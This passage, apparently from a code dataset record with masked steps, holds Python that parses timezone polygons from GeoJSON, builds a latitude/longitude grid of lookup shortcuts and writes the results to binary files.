shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lng in longitudes_to_check(xmax, xmin):\n intersects = sorted([int2coord(y) for y in y_intersections(\n coord2int(lng), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n possible_latitudes = []\n for i in range(0, nr_of_intersects, 2):\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(lng) - 1, coord2int(\n intersection_in), x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(lng) - 1,\n y_shortcut(intersection_in)))\n shortcuts_for_line.add((x_shortcut(lng), y_shortcut(\n intersection_in)))\n else:\n possible_x_shortcut = x_shortcut(lng)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(lng) - 1, coord2int(middle),\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n possible_x_shortcut_min1 = possible_x_shortcut - 1\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n shortcuts_for_line.add((\n possible_x_shortcut_min1, y_shortcut(\n possible_latitude)))\n else:\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n return shortcuts_for_line\n\n def construct_shortcuts():\n print('building shortucts...')\n print('currently at polygon nr:')\n line = 0\n for xmax, xmin, ymax, ymin in all_boundaries:\n if line % 100 == 0:\n print(line)\n column_nrs = included_shortcut_column_nrs(xmax, xmin)\n row_nrs = included_shortcut_row_nrs(ymax, ymin)\n if big_zone(xmax, xmin, ymax, ymin):\n shortcuts_for_line = compute_exact_shortcuts(xmax, xmin,\n ymax, ymin, line)\n min_x_shortcut = column_nrs[0]\n max_x_shortcut = column_nrs[-1]\n min_y_shortcut = row_nrs[0]\n max_y_shortcut = row_nrs[-1]\n shortcuts_to_remove = []\n for x, y in shortcuts_for_line:\n if (x < min_x_shortcut or x > max_x_shortcut or y <\n min_y_shortcut or y > max_y_shortcut):\n shortcuts_to_remove.append((x, y))\n for s in shortcuts_to_remove:\n shortcuts_for_line.remove(s)\n if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):\n raise ValueError(\n 'there are more shortcuts than before now. there is something wrong with the algorithm!'\n )\n if len(shortcuts_for_line) < 3:\n raise ValueError(\n 'algorithm not valid! less than 3 zones detected (should be at least 3)'\n )\n else:\n shortcuts_for_line = []\n for column_nr in column_nrs:\n for row_nr in row_nrs:\n shortcuts_for_line.append((column_nr, row_nr))\n for shortcut in shortcuts_for_line:\n shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]\n line += 1\n start_time = datetime.now()\n construct_shortcuts()\n end_time = datetime.now()\n print('calculating the shortcuts took:', end_time - start_time, '\\n')\n nr_of_floats = 2 * sum(all_lengths)\n nr_of_entries_in_shortcut = []\n shortcut_entries = []\n amount_filled_shortcuts = 0\n\n def sort_poly_shortcut(poly_nrs):\n polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]\n id_freq = [polygon_ids.count(id) for id in polygon_ids]\n zipped = list(zip(poly_nrs, polygon_ids, id_freq))\n sort = sorted(sorted(zipped, key=lambda x: x[1]), key=lambda x: x[2])\n return [x[0] for x in sort]\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n shortcut_entries.append(sort_poly_shortcut(\n shortcuts_this_entry))\n amount_filled_shortcuts += 1\n nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))\n except KeyError:\n nr_of_entries_in_shortcut.append(0)\n amount_of_shortcuts = len(nr_of_entries_in_shortcut)\n print_shortcut_statistics()\n if (amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG *\n NR_SHORTCUTS_PER_LAT):\n print(amount_of_shortcuts)\n raise ValueError('this number of shortcut zones is wrong')\n print('The number of filled shortcut zones are:',\n amount_filled_shortcuts, '(=', round(amount_filled_shortcuts /\n amount_of_shortcuts * 100, 2), '% of all shortcuts)')\n shortcut_space = (360 * NR_SHORTCUTS_PER_LNG * 180 *\n NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I))\n for nr in nr_of_entries_in_shortcut:\n shortcut_space += NR_BYTES_H * nr\n print('The number of polygons is:', nr_of_lines)\n print('The number of floats in all the polygons is (2 per point):',\n nr_of_floats)\n path = 'poly_nr2zone_id.bin'\n print('writing file', path)\n output_file = open(path, 'wb')\n for zone_id in poly_nr2zone_id:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n print('Done\\n')\n path = 'poly_zone_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for zone_id in poly_zone_ids:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n path = 'poly_max_values.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for xmax, xmin, ymax, ymin in all_boundaries:\n output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin),\n coord2int(ymax), coord2int(ymin)))\n output_file.close()\n path = 'poly_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n addresses = []\n i = 0\n for x_coords, y_coords in all_coords:\n addresses.append(output_file.tell())\n if all_lengths[i] != len(x_coords):\n raise ValueError('x_coords do not have the expected length!',\n all_lengths[i], len(x_coords))\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n i += 1\n output_file.close()\n path = 'poly_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for adr in addresses:\n output_file.write(pack(b'<I', adr))\n output_file.close()\n path = 'poly_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_lengths:\n output_file.write(pack(b'<I', length))\n output_file.close()\n path = 'shortcuts_entry_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr > 300:\n raise ValueError('There are too many polygons in this shortcut:',\n nr)\n output_file.write(pack(b'<H', nr))\n output_file.close()\n adr = 0\n path = 'shortcuts_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr == 0:\n output_file.write(pack(b'<I', 0))\n else:\n output_file.write(pack(b'<I', adr))\n adr += 2 * nr\n output_file.close()\n path = 'shortcuts_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for entries in shortcut_entries:\n for entry in entries:\n if entry > nr_of_lines:\n raise ValueError(entry)\n output_file.write(pack(b'<H', entry))\n output_file.close()\n path = 'shortcuts_unique_id.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n if poly_zone_ids[-1] >= INVALID_ZONE_ID:\n raise ValueError(\n 'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!'\n )\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n unique_id = poly_zone_ids[shortcuts_this_entry[0]]\n for nr in shortcuts_this_entry:\n if poly_zone_ids[nr] != unique_id:\n unique_id = INVALID_ZONE_ID\n break\n output_file.write(pack(b'<H', unique_id))\n except KeyError:\n output_file.write(pack(b'<H', INVALID_ZONE_ID))\n output_file.close()\n hole_space = 0\n path = 'hole_poly_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n i = 0\n for line in polynrs_of_holes:\n if line > nr_of_lines:\n raise ValueError(line, nr_of_lines)\n output_file.write(pack(b'<H', line))\n i += 1\n hole_space += output_file.tell()\n output_file.close()\n if i > amount_of_holes:\n raise ValueError('There are more related lines than holes.')\n path = 'hole_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<H', length))\n hole_space += output_file.tell()\n output_file.close()\n adr = 0\n path = 'hole_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<I', adr))\n adr += 2 * NR_BYTES_I * length\n hole_space += output_file.tell()\n output_file.close()\n path = 'hole_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for x_coords, y_coords in all_holes:\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n hole_space += output_file.tell()\n output_file.close()\n polygon_space = nr_of_floats * NR_BYTES_I\n total_space = polygon_space + hole_space + shortcut_space\n print('the polygon data makes up', percent(polygon_space, total_space),\n '% of the data')\n print('the shortcuts make up', percent(shortcut_space, total_space),\n '% of the data')\n print('holes make up', percent(hole_space, total_space), '% of the data')\n print('Success!')\n return\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef x_shortcut(lng):\n return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)\n\n\ndef y_shortcut(lat):\n return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)\n\n\ndef big_zone(xmax, xmin, ymax, ymin):\n return (xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 /\n NR_SHORTCUTS_PER_LAT)\n\n\ndef percent(numerator, denominator):\n return round(numerator / denominator * 100, 2)\n\n\n<mask token>\n\n\ndef ints_of(line=0):\n x_coords, y_coords = all_coords[line]\n return [coord2int(x) for x in x_coords], [coord2int(x) for x in y_coords]\n\n\ndef contained(x, y, x_coords, y_coords):\n return inside_polygon(x, y, [x_coords, y_coords])\n\n\ndef unique(iterable):\n out = []\n for i in iterable:\n if i not in out:\n out.append(i)\n return out\n\n\ndef point_between(p1, p2):\n return p1[0] + (p2[0] - p1[0]) / 2, p1[1] + (p2[1] - p1[1]) / 2\n\n\ndef get_shortcuts(x, y):\n result = shortcuts.get((x, y))\n if result is None:\n return []\n else:\n return result\n\n\n<mask token>\n\n\ndef polys_of_one_zone():\n for i in range(len(timezone_names)):\n start = poly_nr2zone_id[i]\n end = poly_nr2zone_id[i + 1]\n yield list(range(start, end))\n\n\ndef replace_entry(iterable, entry, substitute):\n for i in range(len(iterable)):\n if iterable[i] == entry:\n iterable[i] = substitute\n return iterable\n\n\ndef _holes_in_poly(poly_nr):\n i = 0\n for nr in polynrs_of_holes:\n if nr == poly_nr:\n yield all_holes[i]\n i += 1\n\n\ndef parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):\n global amount_of_holes\n global nr_of_lines\n global poly_zone_ids\n print('Parsing data from {}\\nthis could take a while...\\n'.format(path))\n tz_list = json.loads(open(path).read()).get('features')\n polygon_counter = 0\n current_zone_id = 0\n print('holes found at: (poly_nr zone_name)')\n for tz_dict in tz_list:\n if DEBUG and polygon_counter > DEBUG_POLY_STOP:\n break\n tz_name = tz_dict.get('properties').get('tzid')\n all_tz_names.append(tz_name)\n geometry = tz_dict.get('geometry')\n if geometry.get('type') == 'MultiPolygon':\n multipolygon = geometry.get('coordinates')\n else:\n multipolygon = [geometry.get('coordinates')]\n for poly_with_hole in multipolygon:\n x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_coords.append((x_coords, y_coords))\n all_lengths.append(len(x_coords))\n all_boundaries.append((max(x_coords), min(x_coords), max(\n y_coords), min(y_coords)))\n poly_zone_ids.append(current_zone_id)\n for hole in poly_with_hole:\n print(polygon_counter, tz_name)\n amount_of_holes += 1\n polynrs_of_holes.append(polygon_counter)\n x_coords, y_coords = list(zip(*hole))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_holes.append((x_coords, y_coords))\n all_hole_lengths.append(len(x_coords))\n polygon_counter += 1\n current_zone_id += 1\n if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):\n raise ValueError(\n 'amount of coords cannot be represented by int32 in poly_coord_amount.bin:'\n , max(all_lengths))\n if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:'\n , max(all_hole_lengths))\n nr_of_lines = len(all_lengths)\n if polygon_counter != nr_of_lines:\n raise ValueError(\n 'polygon counter and entry number in all_length is different:',\n polygon_counter, nr_of_lines)\n if nr_of_lines >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are'\n , nr_of_lines, 'polygons')\n if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'zone id cannot be encoded as char (int8). the last id is',\n poly_zone_ids[-1])\n if 0 in all_lengths:\n raise ValueError()\n print('... parsing done.')\n print('maximal amount of coordinates in one polygon:', max(all_lengths))\n print('amount_of_holes:', amount_of_holes)\n print('amount of polygons:', nr_of_lines)\n print('\\n')\n\n\ndef update_zone_names(path=TIMEZONE_NAMES_FILE):\n global poly_zone_ids\n global list_of_pointers\n global all_boundaries\n global all_coords\n global all_lengths\n global polynrs_of_holes\n print('updating the zone names in {} now...'.format(path))\n with open(abspath(path), 'w') as f:\n f.write(json.dumps(all_tz_names))\n print('...Done.\\n\\nComputing where zones start and end...')\n i = 0\n last_id = -1\n for zone_id in poly_zone_ids:\n if zone_id != last_id:\n poly_nr2zone_id.append(i)\n if zone_id < last_id:\n raise ValueError()\n last_id = zone_id\n i += 1\n poly_nr2zone_id.append(i)\n print('...Done.\\n')\n\n\ndef compile_binaries():\n global nr_of_lines\n global shortcuts\n\n def print_shortcut_statistics():\n frequencies = []\n max_val = max(*nr_of_entries_in_shortcut)\n print('shortcut statistics:')\n print('highest entry amount is', max_val)\n while max_val >= 0:\n frequencies.append(nr_of_entries_in_shortcut.count(max_val))\n max_val -= 1\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max entries):')\n print(frequencies)\n empty_shortcuts = frequencies[0]\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print(percent(empty_shortcuts, amount_of_shortcuts),\n '% of all shortcuts are empty\\n')\n amount_of_different_zones = []\n for entry in shortcut_entries:\n registered_zone_ids = []\n for polygon_nr in entry:\n id = poly_zone_ids[polygon_nr]\n if id not in registered_zone_ids:\n registered_zone_ids.append(id)\n amount_of_different_zones.append(len(registered_zone_ids))\n frequencies = []\n max_val = max(*amount_of_different_zones)\n print('highest amount of different zones in one shortcut is', max_val)\n while max_val >= 1:\n frequencies.append(amount_of_different_zones.count(max_val))\n max_val -= 1\n frequencies.append(empty_shortcuts)\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max):')\n print(frequencies)\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print('--------------------------------\\n')\n\n def included_shortcut_row_nrs(max_lat, min_lat):\n return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))\n\n def included_shortcut_column_nrs(max_lng, min_lng):\n return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))\n\n def longitudes_to_check(max_lng, min_lng):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LNG\n current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n end = floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def latitudes_to_check(max_lat, min_lat):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LAT\n current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def compute_x_intersection(y, x1, x2, y1, y2):\n \"\"\"returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2\n \"\"\"\n delta_y = y2 - y1\n if delta_y == 0:\n return x1\n return (y - y1) * (x2 - x1) / delta_y + x1\n\n def compute_y_intersection(x, x1, x2, y1, y2):\n \"\"\"returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2\n \"\"\"\n delta_x = x2 - x1\n if delta_x == 0:\n return x1\n return (x - x1) * (y2 - y1) / delta_x + y1\n\n def x_intersections(y, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if y_coords[i] <= y:\n if y_coords[iplus1] > y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif y_coords[iplus1] <= y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def y_intersections(x, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if x_coords[i] <= x:\n if x_coords[iplus1] > x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif x_coords[iplus1] <= x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):\n shortcuts_for_line = set()\n x_longs, y_longs = ints_of(line)\n y_longs.append(y_longs[0])\n x_longs.append(x_longs[0])\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lat in latitudes_to_check(ymax, ymin):\n intersects = sorted([int2coord(x) for x in x_intersections(\n coord2int(lat), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n for i in range(0, nr_of_intersects, 2):\n possible_longitudes = []\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(intersection_in), coord2int(lat) +\n 1, x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat) - 1))\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat)))\n else:\n possible_y_shortcut = y_shortcut(lat)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(middle), coord2int(lat) + 1,\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n possible_y_shortcut_min1 = possible_y_shortcut - 1\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut_min1))\n else:\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lng in longitudes_to_check(xmax, xmin):\n intersects = sorted([int2coord(y) for y in y_intersections(\n coord2int(lng), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n possible_latitudes = []\n for i in range(0, nr_of_intersects, 2):\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(lng) - 1, coord2int(\n intersection_in), x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(lng) - 1,\n y_shortcut(intersection_in)))\n shortcuts_for_line.add((x_shortcut(lng), y_shortcut(\n intersection_in)))\n else:\n possible_x_shortcut = x_shortcut(lng)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(lng) - 1, coord2int(middle),\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n possible_x_shortcut_min1 = possible_x_shortcut - 1\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n shortcuts_for_line.add((\n possible_x_shortcut_min1, y_shortcut(\n possible_latitude)))\n else:\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n return shortcuts_for_line\n\n def construct_shortcuts():\n print('building shortucts...')\n print('currently at polygon nr:')\n line = 0\n for xmax, xmin, ymax, ymin in all_boundaries:\n if line % 100 == 0:\n print(line)\n column_nrs = included_shortcut_column_nrs(xmax, xmin)\n row_nrs = included_shortcut_row_nrs(ymax, ymin)\n if big_zone(xmax, xmin, ymax, ymin):\n shortcuts_for_line = compute_exact_shortcuts(xmax, xmin,\n ymax, ymin, line)\n min_x_shortcut = column_nrs[0]\n max_x_shortcut = column_nrs[-1]\n min_y_shortcut = row_nrs[0]\n max_y_shortcut = row_nrs[-1]\n shortcuts_to_remove = []\n for x, y in shortcuts_for_line:\n if (x < min_x_shortcut or x > max_x_shortcut or y <\n min_y_shortcut or y > max_y_shortcut):\n shortcuts_to_remove.append((x, y))\n for s in shortcuts_to_remove:\n shortcuts_for_line.remove(s)\n if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):\n raise ValueError(\n 'there are more shortcuts than before now. there is something wrong with the algorithm!'\n )\n if len(shortcuts_for_line) < 3:\n raise ValueError(\n 'algorithm not valid! less than 3 zones detected (should be at least 3)'\n )\n else:\n shortcuts_for_line = []\n for column_nr in column_nrs:\n for row_nr in row_nrs:\n shortcuts_for_line.append((column_nr, row_nr))\n for shortcut in shortcuts_for_line:\n shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]\n line += 1\n start_time = datetime.now()\n construct_shortcuts()\n end_time = datetime.now()\n print('calculating the shortcuts took:', end_time - start_time, '\\n')\n nr_of_floats = 2 * sum(all_lengths)\n nr_of_entries_in_shortcut = []\n shortcut_entries = []\n amount_filled_shortcuts = 0\n\n def sort_poly_shortcut(poly_nrs):\n polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]\n id_freq = [polygon_ids.count(id) for id in polygon_ids]\n zipped = list(zip(poly_nrs, polygon_ids, id_freq))\n sort = sorted(sorted(zipped, key=lambda x: x[1]), key=lambda x: x[2])\n return [x[0] for x in sort]\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n shortcut_entries.append(sort_poly_shortcut(\n shortcuts_this_entry))\n amount_filled_shortcuts += 1\n nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))\n except KeyError:\n nr_of_entries_in_shortcut.append(0)\n amount_of_shortcuts = len(nr_of_entries_in_shortcut)\n print_shortcut_statistics()\n if (amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG *\n NR_SHORTCUTS_PER_LAT):\n print(amount_of_shortcuts)\n raise ValueError('this number of shortcut zones is wrong')\n print('The number of filled shortcut zones are:',\n amount_filled_shortcuts, '(=', round(amount_filled_shortcuts /\n amount_of_shortcuts * 100, 2), '% of all shortcuts)')\n shortcut_space = (360 * NR_SHORTCUTS_PER_LNG * 180 *\n NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I))\n for nr in nr_of_entries_in_shortcut:\n shortcut_space += NR_BYTES_H * nr\n print('The number of polygons is:', nr_of_lines)\n print('The number of floats in all the polygons is (2 per point):',\n nr_of_floats)\n path = 'poly_nr2zone_id.bin'\n print('writing file', path)\n output_file = open(path, 'wb')\n for zone_id in poly_nr2zone_id:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n print('Done\\n')\n path = 'poly_zone_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for zone_id in poly_zone_ids:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n path = 'poly_max_values.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for xmax, xmin, ymax, ymin in all_boundaries:\n output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin),\n coord2int(ymax), coord2int(ymin)))\n output_file.close()\n path = 'poly_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n addresses = []\n i = 0\n for x_coords, y_coords in all_coords:\n addresses.append(output_file.tell())\n if all_lengths[i] != len(x_coords):\n raise ValueError('x_coords do not have the expected length!',\n all_lengths[i], len(x_coords))\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n i += 1\n output_file.close()\n path = 'poly_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for adr in addresses:\n output_file.write(pack(b'<I', adr))\n output_file.close()\n path = 'poly_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_lengths:\n output_file.write(pack(b'<I', length))\n output_file.close()\n path = 'shortcuts_entry_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr > 300:\n raise ValueError('There are too many polygons in this shortcut:',\n nr)\n output_file.write(pack(b'<H', nr))\n output_file.close()\n adr = 0\n path = 'shortcuts_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr == 0:\n output_file.write(pack(b'<I', 0))\n else:\n output_file.write(pack(b'<I', adr))\n adr += 2 * nr\n output_file.close()\n path = 'shortcuts_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for entries in shortcut_entries:\n for entry in entries:\n if entry > nr_of_lines:\n raise ValueError(entry)\n output_file.write(pack(b'<H', entry))\n output_file.close()\n path = 'shortcuts_unique_id.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n if poly_zone_ids[-1] >= INVALID_ZONE_ID:\n raise ValueError(\n 'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!'\n )\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n unique_id = poly_zone_ids[shortcuts_this_entry[0]]\n for nr in shortcuts_this_entry:\n if poly_zone_ids[nr] != unique_id:\n unique_id = INVALID_ZONE_ID\n break\n output_file.write(pack(b'<H', unique_id))\n except KeyError:\n output_file.write(pack(b'<H', INVALID_ZONE_ID))\n output_file.close()\n hole_space = 0\n path = 'hole_poly_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n i = 0\n for line in polynrs_of_holes:\n if line > nr_of_lines:\n raise ValueError(line, nr_of_lines)\n output_file.write(pack(b'<H', line))\n i += 1\n hole_space += output_file.tell()\n output_file.close()\n if i > amount_of_holes:\n raise ValueError('There are more related lines than holes.')\n path = 'hole_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<H', length))\n hole_space += output_file.tell()\n output_file.close()\n adr = 0\n path = 'hole_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<I', adr))\n adr += 2 * NR_BYTES_I * length\n hole_space += output_file.tell()\n output_file.close()\n path = 'hole_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for x_coords, y_coords in all_holes:\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n hole_space += output_file.tell()\n output_file.close()\n polygon_space = nr_of_floats * NR_BYTES_I\n total_space = polygon_space + hole_space + shortcut_space\n print('the polygon data makes up', percent(polygon_space, total_space),\n '% of the data')\n print('the shortcuts make up', percent(shortcut_space, total_space),\n '% of the data')\n print('holes make up', percent(hole_space, total_space), '% of the data')\n print('Success!')\n return\n\n\n<mask token>\n",
